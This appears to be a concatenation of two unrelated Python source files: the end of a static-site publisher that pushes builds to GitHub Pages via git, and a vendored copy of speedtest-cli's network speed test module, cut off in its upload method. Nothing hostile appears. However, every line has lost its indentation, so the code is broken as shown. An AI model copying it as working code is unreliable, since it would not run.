def git(args, **kwargs):
kwargs['env'] = _patch_git_env(kwargs.pop('env', None),
ssh_command)
return Command(['git'] + args, cwd=path, **kwargs)
for line in git(['init']).output:
yield line
ssh_command = self.update_git_config(path, target_url, branch,
credentials)
for line in git(['remote', 'update']).output:
yield line
if git(['checkout', '-q', branch], silent=True).wait() != 0:
git(['checkout', '-qb', branch], silent=True).wait()
self.link_artifacts(path)
self.write_cname(path, target_url)
for line in git(['add', '-f', '--all', '.']).output:
yield line
for line in git(['commit', '-qm', 'Synchronized build']).output:
yield line
for line in git(['push', 'origin', branch]).output:
yield line
builtin_publishers = {
'rsync': RsyncPublisher,
'ftp': FtpPublisher,
'ftps': FtpTlsPublisher,
'ghpages': GithubPagesPublisher,
'ghpages+https': GithubPagesPublisher,
'ghpages+ssh': GithubPagesPublisher,
}
def publish(env, target, output_path, credentials=None, **extra):
url = urls.url_parse(text_type(target))
publisher = env.publishers.get(url.scheme)
if publisher is None:
raise PublishError('"%s" is an unknown scheme.' % url.scheme)
return publisher(env, output_path).publish(url, credentials, **extra)
|
speedtest.py
|
# Taken from https://github.com/sivel/speedtest-cli
import csv
import datetime
import errno
import math
import os
import platform
import re
import signal
import socket
import sys
import threading
import timeit
import xml.parsers.expat
from insomniac import utils
try:
import gzip
GZIP_BASE = gzip.GzipFile
except ImportError:
gzip = None
GZIP_BASE = object
__version__ = "2.1.2"
class FakeShutdownEvent(object):
"""Class to fake a threading.Event.isSet so that users of this module
are not required to register their own threading.Event()
"""
@staticmethod
def isSet():
"Dummy method to always return false" ""
return False
# Some global variables we use
DEBUG = False
_GLOBAL_DEFAULT_TIMEOUT = object()
PY25PLUS = sys.version_info[:2] >= (2, 5)
PY26PLUS = sys.version_info[:2] >= (2, 6)
PY32PLUS = sys.version_info[:2] >= (3, 2)
# Begin import game to handle Python 2 and Python 3
try:
import json
except ImportError:
try:
import simplejson as json
except ImportError:
json = None
try:
import xml.etree.ElementTree as ET
try:
from xml.etree.ElementTree import _Element as ET_Element
except ImportError:
pass
except ImportError:
from xml.dom import minidom as DOM
from xml.parsers.expat import ExpatError
ET = None
try:
from urllib2 import (
urlopen,
Request,
HTTPError,
URLError,
AbstractHTTPHandler,
ProxyHandler,
HTTPDefaultErrorHandler,
HTTPRedirectHandler,
HTTPErrorProcessor,
OpenerDirector,
)
except ImportError:
from urllib.request import (
urlopen,
Request,
HTTPError,
URLError,
AbstractHTTPHandler,
ProxyHandler,
HTTPDefaultErrorHandler,
HTTPRedirectHandler,
HTTPErrorProcessor,
OpenerDirector,
)
try:
from httplib import HTTPConnection, BadStatusLine
except ImportError:
from http.client import HTTPConnection, BadStatusLine
try:
from httplib import HTTPSConnection
except ImportError:
try:
from http.client import HTTPSConnection
except ImportError:
HTTPSConnection = None
try:
from httplib import FakeSocket
except ImportError:
FakeSocket = None
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
from argparse import SUPPRESS as ARG_SUPPRESS
PARSER_TYPE_INT = int
PARSER_TYPE_STR = str
PARSER_TYPE_FLOAT = float
except ImportError:
from optparse import OptionParser as ArgParser
from optparse import SUPPRESS_HELP as ARG_SUPPRESS
PARSER_TYPE_INT = "int"
PARSER_TYPE_STR = "string"
PARSER_TYPE_FLOAT = "float"
try:
from cStringIO import StringIO
BytesIO = None
except ImportError:
try:
from StringIO import StringIO
BytesIO = None
except ImportError:
from io import StringIO, BytesIO
if PY32PLUS:
etree_iter = ET.Element.iter
elif PY25PLUS:
etree_iter = ET_Element.getiterator
if PY26PLUS:
thread_is_alive = threading.Thread.is_alive
else:
thread_is_alive = threading.Thread.isAlive
# Exception "constants" to support Python 2 through Python 3
try:
import ssl
try:
CERT_ERROR = (ssl.CertificateError,)
except AttributeError:
CERT_ERROR = tuple()
HTTP_ERRORS = (
HTTPError,
URLError,
socket.error,
ssl.SSLError,
BadStatusLine,
) + CERT_ERROR
except ImportError:
ssl = None
HTTP_ERRORS = (HTTPError, URLError, socket.error, BadStatusLine)
class SpeedtestException(Exception):
"""Base exception for this module"""
class SpeedtestCLIError(SpeedtestException):
"""Generic exception for raising errors during CLI operation"""
class SpeedtestHTTPError(SpeedtestException):
"""Base HTTP exception for this module"""
class SpeedtestConfigError(SpeedtestException):
"""Configuration XML is invalid"""
class SpeedtestServersError(SpeedtestException):
"""Servers XML is invalid"""
class ConfigRetrievalError(SpeedtestHTTPError):
"""Could not retrieve config.php"""
class ServersRetrievalError(SpeedtestHTTPError):
"""Could not retrieve speedtest-servers.php"""
class InvalidServerIDType(SpeedtestException):
"""Server ID used for filtering was not an integer"""
class NoMatchedServers(SpeedtestException):
"""No servers matched when filtering"""
class SpeedtestMiniConnectFailure(SpeedtestException):
"""Could not connect to the provided speedtest mini server"""
class InvalidSpeedtestMiniServer(SpeedtestException):
"""Server provided as a speedtest mini server does not actually appear
to be a speedtest mini server
"""
class ShareResultsConnectFailure(SpeedtestException):
"""Could not connect to speedtest.net API to POST results"""
class ShareResultsSubmitFailure(SpeedtestException):
"""Unable to successfully POST results to speedtest.net API after
connection
"""
class SpeedtestUploadTimeout(SpeedtestException):
"""testlength configuration reached during upload
Used to ensure the upload halts when no additional data should be sent
"""
class SpeedtestBestServerFailure(SpeedtestException):
"""Unable to determine best server"""
class SpeedtestMissingBestServer(SpeedtestException):
"""get_best_server not called or not able to determine best server"""
def create_connection(address, timeout=_GLOBAL_DEFAULT_TIMEOUT, source_address=None):
"""Connect to *address* and return the socket object.
Convenience function. Connect to *address* (a 2-tuple ``(host,
port)``) and return the socket object. Passing the optional
*timeout* parameter will set the timeout on the socket instance
before attempting to connect. If no *timeout* is supplied, the
global default timeout setting returned by :func:`getdefaulttimeout`
is used. If *source_address* is set it must be a tuple of (host, port)
for the socket to bind as a source address before making the connection.
An host of '' or port 0 tells the OS to use the default.
Largely vendored from Python 2.7, modified to work with Python 2.4
"""
host, port = address
err = None
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
sock = None
try:
sock = socket.socket(af, socktype, proto)
if timeout is not _GLOBAL_DEFAULT_TIMEOUT:
sock.settimeout(float(timeout))
if source_address:
sock.bind(source_address)
sock.connect(sa)
return sock
except socket.error:
err = get_exception()
if sock is not None:
sock.close()
if err is not None:
raise err
else:
raise socket.error("getaddrinfo returns an empty list")
class SpeedtestHTTPConnection(HTTPConnection):
"""Custom HTTPConnection to support source_address across
Python 2.4 - Python 3
"""
def __init__(self, *args, **kwargs):
source_address = kwargs.pop("source_address", None)
timeout = kwargs.pop("timeout", 10)
self._tunnel_host = None
HTTPConnection.__init__(self, *args, **kwargs)
self.source_address = source_address
self.timeout = timeout
def connect(self):
"""Connect to the host and port specified in __init__."""
try:
self.sock = socket.create_connection(
(self.host, self.port), self.timeout, self.source_address
)
except (AttributeError, TypeError):
self.sock = create_connection(
(self.host, self.port), self.timeout, self.source_address
)
if self._tunnel_host:
self._tunnel()
if HTTPSConnection:
class SpeedtestHTTPSConnection(HTTPSConnection):
"""Custom HTTPSConnection to support source_address across
Python 2.4 - Python 3
"""
default_port = 443
def __init__(self, *args, **kwargs):
source_address = kwargs.pop("source_address", None)
timeout = kwargs.pop("timeout", 10)
self._tunnel_host = None
HTTPSConnection.__init__(self, *args, **kwargs)
self.timeout = timeout
self.source_address = source_address
def connect(self):
"Connect to a host on a given (SSL) port."
try:
self.sock = socket.create_connection(
(self.host, self.port), self.timeout, self.source_address
)
except (AttributeError, TypeError):
self.sock = create_connection(
(self.host, self.port), self.timeout, self.source_address
)
if self._tunnel_host:
self._tunnel()
if ssl:
try:
kwargs = {}
if hasattr(ssl, "SSLContext"):
if self._tunnel_host:
kwargs["server_hostname"] = self._tunnel_host
else:
kwargs["server_hostname"] = self.host
self.sock = self._context.wrap_socket(self.sock, **kwargs)
except AttributeError:
self.sock = ssl.wrap_socket(self.sock)
try:
self.sock.server_hostname = self.host
except AttributeError:
pass
elif FakeSocket:
# Python 2.4/2.5 support
try:
self.sock = FakeSocket(self.sock, socket.ssl(self.sock))
except AttributeError:
raise SpeedtestException(
"This version of Python does not support HTTPS/SSL "
"functionality"
)
else:
raise SpeedtestException(
"This version of Python does not support HTTPS/SSL " "functionality"
)
def _build_connection(connection, source_address, timeout, context=None):
"""Cross Python 2.4 - Python 3 callable to build an ``HTTPConnection`` or
``HTTPSConnection`` with the args we need
Called from ``http(s)_open`` methods of ``SpeedtestHTTPHandler`` or
``SpeedtestHTTPSHandler``
"""
def inner(host, **kwargs):
kwargs.update({"source_address": source_address, "timeout": timeout})
if context:
kwargs["context"] = context
return connection(host, **kwargs)
return inner
class SpeedtestHTTPHandler(AbstractHTTPHandler):
"""Custom ``HTTPHandler`` that can build a ``HTTPConnection`` with the
args we need for ``source_address`` and ``timeout``
"""
def __init__(self, debuglevel=0, source_address=None, timeout=10):
AbstractHTTPHandler.__init__(self, debuglevel)
self.source_address = source_address
self.timeout = timeout
def http_open(self, req):
return self.do_open(
_build_connection(
SpeedtestHTTPConnection, self.source_address, self.timeout
),
req,
)
http_request = AbstractHTTPHandler.do_request_
class SpeedtestHTTPSHandler(AbstractHTTPHandler):
"""Custom ``HTTPSHandler`` that can build a ``HTTPSConnection`` with the
args we need for ``source_address`` and ``timeout``
"""
def __init__(self, debuglevel=0, context=None, source_address=None, timeout=10):
AbstractHTTPHandler.__init__(self, debuglevel)
self._context = context
self.source_address = source_address
self.timeout = timeout
def https_open(self, req):
return self.do_open(
_build_connection(
SpeedtestHTTPSConnection,
self.source_address,
self.timeout,
context=self._context,
),
req,
)
https_request = AbstractHTTPHandler.do_request_
def build_opener(source_address=None, timeout=10):
"""Function similar to ``urllib2.build_opener`` that will build
an ``OpenerDirector`` with the explicit handlers we want,
``source_address`` for binding, ``timeout`` and our custom
`User-Agent`
"""
printer("Timeout set to %d" % timeout, debug=True)
if source_address:
source_address_tuple = (source_address, 0)
printer("Binding to source address: %r" % (source_address_tuple,), debug=True)
else:
source_address_tuple = None
handlers = [
ProxyHandler(),
SpeedtestHTTPHandler(source_address=source_address_tuple, timeout=timeout),
SpeedtestHTTPSHandler(source_address=source_address_tuple, timeout=timeout),
HTTPDefaultErrorHandler(),
HTTPRedirectHandler(),
HTTPErrorProcessor(),
]
opener = OpenerDirector()
opener.addheaders = [("User-agent", build_user_agent())]
for handler in handlers:
opener.add_handler(handler)
return opener
class GzipDecodedResponse(GZIP_BASE):
"""A file-like object to decode a response encoded with the gzip
method, as described in RFC 1952.
Largely copied from ``xmlrpclib``/``xmlrpc.client`` and modified
to work for py2.4-py3
"""
def __init__(self, response):
# response doesn't support tell() and read(), required by
# GzipFile
if not gzip:
raise SpeedtestHTTPError(
"HTTP response body is gzip encoded, "
"but gzip support is not available"
)
IO = BytesIO or StringIO
self.io = IO()
while 1:
chunk = response.read(1024)
if len(chunk) == 0:
break
self.io.write(chunk)
self.io.seek(0)
gzip.GzipFile.__init__(self, mode="rb", fileobj=self.io)
def close(self):
try:
gzip.GzipFile.close(self)
finally:
self.io.close()
def get_exception():
"""Helper function to work with py2.4-py3 for getting the current
exception in a try/except block
"""
return sys.exc_info()[1]
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(
math.radians(lat1)
) * math.cos(math.radians(lat2)) * math.sin(dlon / 2) * math.sin(dlon / 2)
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
def build_user_agent():
"""Build a Mozilla/5.0 compatible User-Agent string"""
ua_tuple = (
"Mozilla/5.0",
"(%s; U; %s; en-us)" % (platform.platform(), platform.architecture()[0]),
"Python/%s" % platform.python_version(),
"(KHTML, like Gecko)",
"speedtest-cli/%s" % __version__,
)
user_agent = " ".join(ua_tuple)
printer("User-Agent: %s" % user_agent, debug=True)
return user_agent
def build_request(url, data=None, headers=None, bump="0", secure=False):
"""Build a urllib2 request object
This function automatically adds a User-Agent header to all requests
"""
if not headers:
headers = {}
if url[0] == ":":
scheme = ("http", "https")[bool(secure)]
schemed_url = "%s%s" % (scheme, url)
else:
schemed_url = url
if "?" in url:
delim = "&"
else:
delim = "?"
# WHO YOU GONNA CALL? CACHE BUSTERS!
final_url = "%s%sx=%s.%s" % (
schemed_url,
delim,
int(timeit.time.time() * 1000),
bump,
)
headers.update(
{
"Cache-Control": "no-cache",
}
)
printer("%s %s" % (("GET", "POST")[bool(data)], final_url), debug=True)
return Request(final_url, data=data, headers=headers)
def catch_request(request, opener=None):
"""Helper function to catch common exceptions encountered when
establishing a connection with a HTTP/HTTPS request
"""
if opener:
_open = opener.open
else:
_open = urlopen
try:
uh = _open(request)
if request.get_full_url() != uh.geturl():
printer("Redirected to %s" % uh.geturl(), debug=True)
return uh, False
except HTTP_ERRORS:
e = get_exception()
return None, e
def get_response_stream(response):
"""Helper function to return either a Gzip reader if
``Content-Encoding`` is ``gzip`` otherwise the response itself
"""
try:
getheader = response.headers.getheader
except AttributeError:
getheader = response.getheader
if getheader("content-encoding") == "gzip":
return GzipDecodedResponse(response)
return response
def get_attributes_by_tag_name(dom, tag_name):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tag_name)[0]
return dict(list(elem.attributes.items()))
def print_dots(shutdown_event):
"""Built in callback function used by Thread classes for printing
status
"""
def inner(current, total, start=False, end=False):
if shutdown_event.isSet():
return
sys.stdout.write(".")
if current + 1 == total and end is True:
sys.stdout.write("\n")
sys.stdout.flush()
return inner
def do_nothing(*args, **kwargs):
pass
class HTTPDownloader(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, i, request, start, timeout, opener=None, shutdown_event=None):
threading.Thread.__init__(self)
self.request = request
self.result = [0]
self.starttime = start
self.timeout = timeout
self.i = i
if opener:
self._opener = opener.open
else:
self._opener = urlopen
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
def run(self):
try:
if (timeit.default_timer() - self.starttime) <= self.timeout:
f = self._opener(self.request)
while (
not self._shutdown_event.isSet()
and (timeit.default_timer() - self.starttime) <= self.timeout
):
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
class HTTPUploaderData(object):
"""File like object to improve cutting off the upload once the timeout
has been reached
"""
def __init__(self, length, start, timeout, shutdown_event=None):
self.length = length
self.start = start
self.timeout = timeout
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
self._data = None
self.total = [0]
def pre_allocate(self):
chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
multiplier = int(round(int(self.length) / 36.0))
IO = BytesIO or StringIO
try:
self._data = IO(
(
"content1=%s" % (chars * multiplier)[0 : int(self.length) - 9]
).encode()
)
except MemoryError:
raise SpeedtestCLIError(
"Insufficient memory to pre-allocate upload data. Please "
"use --no-pre-allocate"
)
@property
def data(self):
if not self._data:
self.pre_allocate()
return self._data
def read(self, n=10240):
if (
timeit.default_timer() - self.start
) <= self.timeout and not self._shutdown_event.isSet():
chunk = self.data.read(n)
self.total.append(len(chunk))
return chunk
else:
raise SpeedtestUploadTimeout()
def __len__(self):
return self.length
class HTTPUploader(threading.Thread):
"""Thread class for putting a URL"""
def __init__(
self, i, request, start, size, timeout, opener=None, shutdown_event=None
):
threading.Thread.__init__(self)
self.request = request
self.request.data.start = self.starttime = start
self.size = size
self.result = None
self.timeout = timeout
self.i = i
if opener:
self._opener = opener.open
else:
self._opener = urlopen
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
def run(self):
request = self.request
try:
if (
timeit.default_timer() - self.starttime
) <= self.timeout and not self._shutdown_event.isSet():
try:
f = self._opener(request)
except TypeError:
# PY24 expects a string or buffer
# This also causes issues with Ctrl-C, but we will concede
# for the moment that Ctrl-C on PY24 isn't immediate
request = build_request(
self.request.get_full_url(), data=request.data.read(self.size)
)
f = self._opener(request)
f.read(11)
f.close()
self.result = sum(self.request.data.total)
else:
self.result = 0
except (IOError, SpeedtestUploadTimeout):
self.result = sum(self.request.data.total)
class SpeedtestResults(object):
"""Class for holding the results of a speedtest, including:
Download speed
Upload speed
Ping/Latency to test server
Data about server that the test was run against
Additionally this class can return a result data as a dictionary or CSV,
as well as submit a POST of the result data to the speedtest.net API
to get a share results image link.
"""
def __init__(
self,
download=0,
upload=0,
ping=0,
server=None,
client=None,
opener=None,
secure=False,
):
self.download = download
self.upload = upload
self.ping = ping
if server is None:
self.server = {}
else:
self.server = server
self.client = client or {}
self._share = None
self.timestamp = "%sZ" % datetime.datetime.utcnow().isoformat()
self.bytes_received = 0
self.bytes_sent = 0
if opener:
self._opener = opener
else:
self._opener = build_opener()
self._secure = secure
def __repr__(self):
return repr(self.dict())
def share(self):
"""POST data to the speedtest.net API to obtain a share results
link
"""
if self._share:
return self._share
download = int(round(self.download / 1000.0, 0))
ping = int(round(self.ping, 0))
upload = int(round(self.upload / 1000.0, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
api_data = [
"recommendedserverid=%s" % self.server["id"],
"ping=%s" % ping,
"screenresolution=",
"promo=",
"download=%s" % download,
"screendpi=",
"upload=%s" % upload,
"testmethod=http",
"hash=%s"
% md5(
("%s-%s-%s-%s" % (ping, upload, download, "297aae72")).encode()
).hexdigest(),
"touchscreen=none",
"startmode=pingselect",
"accuracy=1",
"bytesreceived=%s" % self.bytes_received,
"bytessent=%s" % self.bytes_sent,
"serverid=%s" % self.server["id"],
]
headers = {"Referer": "http://c.speedtest.net/flash/speedtest.swf"}
request = build_request(
"://www.speedtest.net/api/api.php",
data="&".join(api_data).encode(),
headers=headers,
secure=self._secure,
)
f, e = catch_request(request, opener=self._opener)
if e:
raise ShareResultsConnectFailure(e)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
raise ShareResultsSubmitFailure(
"Could not submit results to " "speedtest.net"
)
qsargs = parse_qs(response.decode())
resultid = qsargs.get("resultid")
if not resultid or len(resultid) != 1:
raise ShareResultsSubmitFailure(
"Could not submit results to " "speedtest.net"
)
self._share = "http://www.speedtest.net/result/%s.png" % resultid[0]
return self._share
def dict(self):
"""Return dictionary of result data"""
return {
"download": self.download,
"upload": self.upload,
"ping": self.ping,
"server": self.server,
"timestamp": self.timestamp,
"bytes_sent": self.bytes_sent,
"bytes_received": self.bytes_received,
"share": self._share,
"client": self.client,
}
@staticmethod
def csv_header(delimiter=","):
"""Return CSV Headers"""
row = [
"Server ID",
"Sponsor",
"Server Name",
"Timestamp",
"Distance",
"Ping",
"Download",
"Upload",
"Share",
"IP Address",
]
out = StringIO()
writer = csv.writer(out, delimiter=delimiter, lineterminator="")
writer.writerow([to_utf8(v) for v in row])
return out.getvalue()
def csv(self, delimiter=","):
"""Return data in CSV format"""
data = self.dict()
out = StringIO()
writer = csv.writer(out, delimiter=delimiter, lineterminator="")
row = [
data["server"]["id"],
data["server"]["sponsor"],
data["server"]["name"],
data["timestamp"],
data["server"]["d"],
data["ping"],
data["download"],
data["upload"],
self._share or "",
self.client["ip"],
]
writer.writerow([to_utf8(v) for v in row])
return out.getvalue()
def json(self, pretty=False):
"""Return data in JSON format"""
kwargs = {}
if pretty:
kwargs.update({"indent": 4, "sort_keys": True})
return json.dumps(self.dict(), **kwargs)
class Speedtest(object):
"""Class for performing standard speedtest.net testing operations"""
def __init__(
self,
config=None,
source_address=None,
timeout=10,
secure=False,
shutdown_event=None,
):
self.config = {}
self._source_address = source_address
self._timeout = timeout
self._opener = build_opener(source_address, timeout)
self._secure = secure
if shutdown_event:
self._shutdown_event = shutdown_event
else:
self._shutdown_event = FakeShutdownEvent()
self.get_config()
if config is not None:
self.config.update(config)
self.servers = {}
self.closest = []
self._best = {}
self.results = SpeedtestResults(
client=self.config["client"],
opener=self._opener,
secure=secure,
)
@property
def best(self):
if not self._best:
self.get_best_server()
return self._best
def get_config(self):
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
headers = {}
if gzip:
headers["Accept-Encoding"] = "gzip"
request = build_request(
"://www.speedtest.net/speedtest-config.php",
headers=headers,
secure=self._secure,
)
uh, e = catch_request(request, opener=self._opener)
if e:
raise ConfigRetrievalError(e)
configxml_list = []
stream = get_response_stream(uh)
while 1:
try:
configxml_list.append(stream.read(1024))
except (OSError, EOFError):
raise ConfigRetrievalError(get_exception())
if len(configxml_list[-1]) == 0:
break
stream.close()
uh.close()
if int(uh.code) != 200:
return None
configxml = "".encode().join(configxml_list)
printer("Config XML:\n%s" % configxml, debug=True)
try:
try:
root = ET.fromstring(configxml)
except ET.ParseError:
e = get_exception()
raise SpeedtestConfigError(
"Malformed speedtest.net configuration: %s" % e
)
server_config = root.find("server-config").attrib
download = root.find("download").attrib
upload = root.find("upload").attrib
# times = root.find('times').attrib
client = root.find("client").attrib
except AttributeError:
try:
root = DOM.parseString(configxml)
except ExpatError:
e = get_exception()
raise SpeedtestConfigError(
"Malformed speedtest.net configuration: %s" % e
)
server_config = get_attributes_by_tag_name(root, "server-config")
download = get_attributes_by_tag_name(root, "download")
upload = get_attributes_by_tag_name(root, "upload")
# times = get_attributes_by_tag_name(root, 'times')
client = get_attributes_by_tag_name(root, "client")
ignore_ids = server_config["ignoreids"]
ignore_servers = (
list(map(int, ignore_ids.split(","))) if ignore_ids != "" else []
)
ratio = int(upload["ratio"])
upload_max = int(upload["maxchunkcount"])
up_sizes = [32768, 65536, 131072, 262144, 524288, 1048576, 7340032]
sizes = {
"upload": up_sizes[ratio - 1 :],
"download": [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000],
}
size_count = len(sizes["upload"])
upload_count = int(math.ceil(upload_max / size_count))
counts = {"upload": upload_count, "download": int(download["threadsperurl"])}
threads = {
"upload": int(upload["threads"]),
"download": int(server_config["threadcount"]) * 2,
}
length = {
"upload": int(upload["testlength"]),
"download": int(download["testlength"]),
}
self.config.update(
{
"client": client,
"ignore_servers": ignore_servers,
"sizes": sizes,
"counts": counts,
"threads": threads,
"length": length,
"upload_max": upload_count * size_count,
}
)
try:
self.lat_lon = (float(client["lat"]), float(client["lon"]))
except ValueError:
raise SpeedtestConfigError(
"Unknown location: lat=%r lon=%r"
% (client.get("lat"), client.get("lon"))
)
printer("Config:\n%r" % self.config, debug=True)
return self.config
def get_servers(self, servers=None, exclude=None):
"""Retrieve a the list of speedtest.net servers, optionally filtered
to servers matching those specified in the ``servers`` argument
"""
if servers is None:
servers = []
if exclude is None:
exclude = []
self.servers.clear()
for server_list in (servers, exclude):
for i, s in enumerate(server_list):
try:
server_list[i] = int(s)
except ValueError:
raise InvalidServerIDType(
"%s is an invalid server type, must be int" % s
)
urls = [
"://www.speedtest.net/speedtest-servers-static.php",
"http://c.speedtest.net/speedtest-servers-static.php",
"://www.speedtest.net/speedtest-servers.php",
"http://c.speedtest.net/speedtest-servers.php",
]
headers = {}
if gzip:
headers["Accept-Encoding"] = "gzip"
errors = []
for url in urls:
try:
request = build_request(
"%s?threads=%s" % (url, self.config["threads"]["download"]),
headers=headers,
secure=self._secure,
)
uh, e = catch_request(request, opener=self._opener)
if e:
errors.append("%s" % e)
raise ServersRetrievalError()
stream = get_response_stream(uh)
serversxml_list = []
while 1:
try:
serversxml_list.append(stream.read(1024))
except (OSError, EOFError):
raise ServersRetrievalError(get_exception())
if len(serversxml_list[-1]) == 0:
break
stream.close()
uh.close()
if int(uh.code) != 200:
raise ServersRetrievalError()
serversxml = "".encode().join(serversxml_list)
printer("Servers XML:\n%s" % serversxml, debug=True)
try:
try:
try:
root = ET.fromstring(serversxml)
except ET.ParseError:
e = get_exception()
raise SpeedtestServersError(
"Malformed speedtest.net server list: %s" % e
)
elements = etree_iter(root, "server")
except AttributeError:
try:
root = DOM.parseString(serversxml)
except ExpatError:
e = get_exception()
raise SpeedtestServersError(
"Malformed speedtest.net server list: %s" % e
)
elements = root.getElementsByTagName("server")
except (SyntaxError, xml.parsers.expat.ExpatError):
raise ServersRetrievalError()
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
if servers and int(attrib.get("id")) not in servers:
continue
if (
int(attrib.get("id")) in self.config["ignore_servers"]
or int(attrib.get("id")) in exclude
):
continue
try:
d = distance(
self.lat_lon,
(float(attrib.get("lat")), float(attrib.get("lon"))),
)
except Exception:
continue
attrib["d"] = d
try:
self.servers[d].append(attrib)
except KeyError:
self.servers[d] = [attrib]
break
except ServersRetrievalError:
continue
if (servers or exclude) and not self.servers:
raise NoMatchedServers()
return self.servers
def set_mini_server(self, server):
"""Instead of querying for a list of servers, set a link to a
speedtest mini server
"""
urlparts = urlparse(server)
name, ext = os.path.splitext(urlparts[2])
if ext:
url = os.path.dirname(server)
else:
url = server
request = build_request(url)
uh, e = catch_request(request, opener=self._opener)
if e:
raise SpeedtestMiniConnectFailure("Failed to connect to %s" % server)
else:
text = uh.read()
uh.close()
extension = re.findall('upload_?[Ee]xtension: "([^"]+)"', text.decode())
if not extension:
for ext in ["php", "asp", "aspx", "jsp"]:
try:
f = self._opener.open("%s/speedtest/upload.%s" % (url, ext))
except Exception:
pass
else:
data = f.read().strip().decode()
if (
f.code == 200
and len(data.splitlines()) == 1
and re.match("size=[0-9]", data)
):
extension = [ext]
break
if not urlparts or not extension:
raise InvalidSpeedtestMiniServer(
"Invalid Speedtest Mini Server: " "%s" % server
)
self.servers = [
{
"sponsor": "Speedtest Mini",
"name": urlparts[1],
"d": 0,
"url": "%s/speedtest/upload.%s" % (url.rstrip("/"), extension[0]),
"latency": 0,
"id": 0,
}
]
return self.servers
def get_closest_servers(self, limit=5):
"""Limit servers to the closest speedtest.net servers based on
geographic distance
"""
if not self.servers:
self.get_servers()
for d in sorted(self.servers.keys()):
for s in self.servers[d]:
self.closest.append(s)
if len(self.closest) == limit:
break
else:
continue
break
printer("Closest Servers:\n%r" % self.closest, debug=True)
return self.closest
def get_best_server(self, servers=None):
"""Perform a speedtest.net "ping" to determine which speedtest.net
server has the lowest latency
"""
if not servers:
if not self.closest:
servers = self.get_closest_servers()
servers = self.closest
if self._source_address:
source_address_tuple = (self._source_address, 0)
else:
source_address_tuple = None
user_agent = build_user_agent()
results = {}
for server in servers:
cum = []
url = os.path.dirname(server["url"])
stamp = int(timeit.time.time() * 1000)
latency_url = "%s/latency.txt?x=%s" % (url, stamp)
for i in range(0, 3):
this_latency_url = "%s.%s" % (latency_url, i)
printer("%s %s" % ("GET", this_latency_url), debug=True)
urlparts = urlparse(latency_url)
try:
if urlparts[0] == "https":
h = SpeedtestHTTPSConnection(
urlparts[1], source_address=source_address_tuple
)
else:
h = SpeedtestHTTPConnection(
urlparts[1], source_address=source_address_tuple
)
headers = {"User-Agent": user_agent}
path = "%s?%s" % (urlparts[2], urlparts[4])
start = timeit.default_timer()
h.request("GET", path, headers=headers)
r = h.getresponse()
total = timeit.default_timer() - start
except HTTP_ERRORS:
e = get_exception()
printer("ERROR: %r" % e, debug=True)
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == "test=test".encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000.0, 3)
results[avg] = server
try:
fastest = sorted(results.keys())[0]
except IndexError:
raise SpeedtestBestServerFailure(
"Unable to connect to servers to " "test latency."
)
best = results[fastest]
best["latency"] = fastest
self.results.ping = fastest
self.results.server = best
self._best.update(best)
printer("Best Server:\n%r" % best, debug=True)
return best
def download(self, callback=do_nothing, threads=None):
"""Test download speed against speedtest.net
A ``threads`` value of ``None`` will fall back to those dictated
by the speedtest.net configuration
"""
urls = []
for size in self.config["sizes"]["download"]:
for _ in range(0, self.config["counts"]["download"]):
urls.append(
"%s/random%sx%s.jpg"
% (os.path.dirname(self.best["url"]), size, size)
)
request_count = len(urls)
requests = []
for i, url in enumerate(urls):
requests.append(build_request(url, bump=i, secure=self._secure))
max_threads = threads or self.config["threads"]["download"]
in_flight = {"threads": 0}
def producer(q, requests, request_count):
for i, request in enumerate(requests):
thread = HTTPDownloader(
i,
request,
start,
self.config["length"]["download"],
opener=self._opener,
shutdown_event=self._shutdown_event,
)
while in_flight["threads"] >= max_threads:
timeit.time.sleep(0.001)
thread.start()
q.put(thread, True)
in_flight["threads"] += 1
callback(i, request_count, start=True)
finished = []
def consumer(q, request_count):
_is_alive = thread_is_alive
while len(finished) < request_count:
thread = q.get(True)
while _is_alive(thread):
thread.join(timeout=0.001)
in_flight["threads"] -= 1
finished.append(sum(thread.result))
callback(thread.i, request_count, end=True)
q = Queue(max_threads)
prod_thread = threading.Thread(
target=producer, args=(q, requests, request_count)
)
cons_thread = threading.Thread(target=consumer, args=(q, request_count))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
_is_alive = thread_is_alive
while _is_alive(prod_thread):
prod_thread.join(timeout=0.001)
while _is_alive(cons_thread):
cons_thread.join(timeout=0.001)
stop = timeit.default_timer()
self.results.bytes_received = sum(finished)
self.results.download = (self.results.bytes_received / (stop - start)) * 8.0
if self.results.download > 100000:
self.config["threads"]["upload"] = 8
return self.results.download
def upload(self, callback=do_nothing, pre_allocate=True, threads=None):
"""Test upload speed against speedtest.net
A ``threads`` value of ``None`` will fall back to those dictated
by the speedtest.net configuration
"""
sizes = []
